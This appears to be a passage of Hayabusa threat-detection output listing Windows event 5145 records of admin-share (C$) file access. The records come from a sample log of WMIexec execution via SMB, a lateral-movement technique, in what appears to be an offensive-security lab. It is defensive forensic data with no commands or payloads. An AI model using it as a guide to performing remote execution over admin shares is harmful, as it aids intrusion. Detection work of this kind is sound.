Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : 
File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
